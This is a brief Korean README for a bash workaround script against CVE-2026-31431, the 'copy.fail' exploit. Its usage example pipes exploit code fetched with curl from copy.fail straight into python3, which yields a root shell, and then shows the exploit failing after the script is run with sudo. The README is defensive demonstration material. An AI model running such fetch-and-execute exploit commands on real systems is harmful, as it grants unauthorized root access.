
CVE-2026-31431을 완화하기 위한 bash 우회 스크립트를 제공하여 copy.fail 익스플로잇을 통한 원격 코드 실행을 방지합니다. 수정 사항 적용을 위한 사용 지침이 포함되어 있습니다.
copyFail-CVE-2026-31431-workaround-bash
사용 예시:
user@host:~$ python3 -c "$(curl -s https://copy.fail/exp -o-)"
# id
uid=0(root) gid=1000(user)
# ctrl+d
user@host:~$ git clone https://github.com/someCorp/copyFail-CVE-2026-31431-workaround-bash
user@host:~$ sudo bash copyFail-CVE-2026-31431-workaround-bash/qdf.sh
user@host:~$ python3 -c "$(curl -s https://copy.fail/exp -o-)"
Traceback (most recent call last):
File "<string>", line 9, in <module>
File "<string>", line 5, in c
FileNotFoundError: [Errno 2] No such file or directory